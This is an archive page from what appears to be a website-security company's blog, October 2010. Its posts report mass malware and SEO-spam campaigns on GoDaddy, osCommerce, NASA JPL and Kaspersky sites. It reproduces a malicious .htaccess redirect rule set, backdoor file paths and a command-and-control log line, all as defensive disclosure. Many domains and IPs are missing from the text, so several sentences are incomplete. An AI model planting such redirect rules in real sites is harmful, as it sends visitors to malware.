Archives for October 2010

Attacks on GoDaddy sites –

UPDATE: As of 4AM Pacific, on November 3rd, we’ve received various reports of another related outbreak of exploited sites on GoDaddy. We’re currently researching the issue and will provide updated scripts if necessary. Please comment below if you have been affected, or if you have any information on the exploit.

Just a quick update to this blog post: More Attacks –

We posted a few days ago that attackers were using to spread malware to multiple web sites. Today, they changed domains and are targeting GoDaddy sites using

The following domains/IP addresses are being used to spread the attack:

Read More

Hilary Kneber at it again:

The Hilary Kneber group is at it again. We are now tracking their usage of to push malware to quite a few sites. If you don’t know about them, just take a look at our blog history. Most of the mass attacks we posted were controlled and created by them.

All the infected sites have this malware:

<script src="”..

Which is generated by a large string of encoded PHP added to all files in a site. If your site got hacked, we have a clean up solution here: Some details here too: MW:GDD:3.

The above code loads malware from, which is hosted at (from – famous fake AV site).

And the whois for

Domain name:
Registrant Contact:
HardSoft, inc
Hilary Kneber
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947

Administrative Contact:
Hilary Kneber
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947

This IP is hosted, which was also the home of recent attacks:

We will post more details when we get them.

Is your site hacked? Visit and we will clean up the mess for you.

Malware update:

Quick malware update: The site (nice name) is being used to distribute SEO spam and malware (the famous fake AV). We recently wrote about the domain ssl-validation, but it seems that they disabled it and are using ssl-verification instead now.

You can get details of the code being used here: 7ea73e3ac775b52b945d5b45a5abb7ad and b99003ddc4a4815bb82a39cc6af3b452

All the infected sites so far had an encoded piece of PHP code inside their index.php or footer.php (if using WordPress) and a backdoor inside a random PHP file. We found the backdoor and by the analyzing logs, we could find the C&C IP address: – – [20/Oct/2010:03:35:21 -0700] “GET /img/readthat.php HTTP/1.1” 200 11204 “” “Opera/9.80 (Macintosh; Intel Mac OS X; U; ru) Presto/2.2.15 Version/10.10”

What is interesting is that it seems the attackers are using to manage their network of infected sites and according to Google, they have more than 4k sites under their control.

The malicious site is hosted at, so suggestion for hosting companies: Block this IP.

Having issues with malware? Sign up at and we will get it all sorted out.

More attacks – Hilary Kneber and

For the last couple of days, we’ve been seeing a good number of sites hacked with a familiar pattern. All of them have a javascript loading malware (the famous fake AV) from:

This is very similar to the GoDaddy attack of a few weeks ago, but this time it’s affecting other hosting providers.

All the sites we’ve seen so far have the following code added to all PHP files:


What is interesting is that this site is hosted at, which was used on previous attacks by the “Hilary Kneber” group, so we think they are all related (even though this domain wasn’t registered in their name)

Read More

NASA web site hacked and serving malware/spam

Some sites under NASA’s Jet Propulsion lab ( ) have been hacked and are being used on the infamous blackhat SEO Spam network. Not only that, but they are also serving malware to unsuspicious users.

The sites in question are, and a few others. Most of these malicious pages are well hidden in the site, for example at

NASA with spam

You can also search on google for “cialis canada” to find a few more pages and sites infected:

Read More

Kaspersky site hacked and redirecting users to fake AV

If you tried to download and/or visit Kaspersky’s web site yesterday, please check if your computer didn’t get infected. Their web site was hacked and their download pages were redirecting users to a fake AV (malware) page.

The malware was getting loaded from, which is already blacklisted by Google:

Has this site acted as an intermediary resulting in further distribution of malware? Over the past 90 days, appeared to function as an intermediary for the infection of 46 site(s) including,,

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 1941 domain(s), including,,

Users are complaining about it in their forums, but Kaspersky has not released an official statement about it:

Update: Kaspersky confirmed the incident to

It shows that even security companies are not immune from this types of attacks. Hopefully they will post an update soon.

Rail Europe trying to sell me Amoxicillin – Pharma hack

I was looking to buy some Amoxicillin online today and didn’t want to get a prescription. So I went to Google and searched for it. Interesting enough, Rail Europe ( ) was the first result.

Ok, so I’m kidding, I was not searching for Amoxicillin. I was however being truthful about Rail Europe being hacked with the infamous Blackhat SEO Spam (pharma) technique.

Infecting sites with ads for medicine to treat infections, how awesome is that?

Pharma hack

Read More

osCommerce attacks –

We are seeing a very large number of osCommerce sites hacked on the last few days. If you are an osCommerce user, make sure to update it asap and check if to see if it’s been infected (also remove the file_manager.php from the admin directory).

These attacks seems to be using the same vulnerability used in previous attacks (,, etc).

The latest version consists of the following:

1 .htaccess is modified to redirect users to,,, etc (just the first domain infected more than 600 sites according to Google).

This is what the .htaccess looks like:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteRule ^(.*)$ [R=301,L]

2 A backdoor is created inside /js/conf.php and another one at /flops.php. Make sure to remove these and search for other PHP files that are not part of the official osCommerce distribution.

3 Blackhat SEO SPAM is added to includes/application_bottom.php.

All the domains used in this attack are hosted at

This is how our malware scanner detects an infected site:

OsCommerce hacked

OsCommerce hacked

We will post more details as we learn more about it. This link gives some good tips on how to secure osCommerce.

If your site is hacked and you need help, contact us a or

More attacks – Hilary Kneber and meqashoppecom – Part II

A few days ago we reported a large scale attack affecting WordPress sites at hosted on 123-reg servers. They were using the domains and meqashopperonline.ccom to spread the malware. You can read more about it here.

Today, we’re seeing a small variation of this attack. We’re continuing our research, but it seems the attack has spread to another host, and maybe more. The attackers are using to spread the malware and the following javascript gets added to the affected sites (result from our scanner):

Read More – Please protect your forum or shut it down

A note to Please protect your forums or shut it down.

Not only are more than half of the posts ( serving SPAM, they are also being used to affect other web sites. More often than not, when a site gets hacked with SEO Spam, we see links like this one (pointing to

purchasing   viagra  overnight &nbsp – Tramadol and pregnancy (

The main page of the forum is all serving spam (see the recent posts) tab:

Read More